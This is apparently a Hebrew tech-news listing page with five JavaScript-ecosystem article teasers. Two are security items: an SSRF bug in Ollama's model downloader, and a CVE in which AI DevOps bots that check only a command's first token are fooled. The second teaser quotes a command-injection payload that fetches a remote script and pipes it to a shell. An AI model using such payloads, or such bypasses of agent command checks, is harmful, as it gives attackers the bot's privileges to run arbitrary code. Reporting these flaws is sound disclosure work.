GyaanSetu JavaScript

האקוסיסטם של JavaScript ו-TypeScript.

90 articlesDeep, practical knowledge

מוריד המודלים של Ollama מאפשר לתוקפים ללא אימות להשיג מטא-דאטה של ענן באמצעות SSRF

באג ה-SSRF נותר בעינו בגרסה 0.33.2 של Ollama מכיוון שמוריד מודל ה-tensor משתמש בלקוח HTTP נפרד שמתעלם ממנגנון הגנת ההפניה (redirect guard) שנוסף עבור CVE-2026-5530, מה שמאפשר לתוקפים להפנות הורדות לכל כתובת נגישה.

JavaScript · 3 min read

חשיפת בוטים של DevOps מבוססי AI: רשימות לבנות של קידומות מאפשרות לתוקפים להריץ קוד שרירותי

CVE-2026-22708 מדגים כי סוכנים הבודקים רק את הטוקן הראשון של פקודה עלולים להוטעות על ידי מטעים (payloads) המוסתרים בתוך ארגומנטים — למשל, git branch "$(curl evil.sh|sh)" — מה שמעניק לתוקפים את אותן ההרשאות שיש לבוט האוטומציה.

JavaScript · 4 min read

Vapor Mode של Vue 3.6 מוותר על ה-Virtual DOM ומשפר את ביצועי המשחקים

ה-Vapor Mode הקרוב של Vue 3.6 מקמפל רכיבי קובץ יחיד (single-file components) לקריאות DOM ישירות, ובכך מבטל את שלב ה-diff של ה-virtual-DOM. במשחקי בדיקה המתרעננים עשרות פעמים בשנייה, השינוי מקצר את זמן הרינדור ומקטין את גודל ה-bundles, אם כי בממשקי משתמש בעלי תדירות נמוכה ניתן לראות שיפור מועט בלבד.

JavaScript · 4 min read

הפעלת SharedArrayBuffer אילצה אותי לוותר על כל סקריפטים של צד שלישי

הוספת כותרות COOP ו-COEP פתחה את האפשרות ל-multithreading אמיתי, אך חסמה באופן מיידי כלי אנליטיקה, גופני Google, הטמעות YouTube וחלונות קופצים של OAuth, מה שדחף אותי לארח את הנכסים בעצמי ולכתוב מחדש את ה-front-end מהיסוד.

JavaScript · 4 min read

AGP 9.2.0 מכפיל את מהירות ה-Kotlin Coroutines באמצעות כתיבה מחדש של Bytecode ב-R8

ה-R8 המובנה ב-Android Gradle Plugin 9.2.0 מחליף כעת קריאות רפלקטיביות של AtomicFieldUpdater בפקודת Unsafe אחת, מה שמפחית משמעותית את עלויות הסנכרון ומספק פעולות channel, mutex ו-StateFlow מהירות פי 2 בערך, ללא כל שינוי בקוד המקור.

JavaScript · 4 min read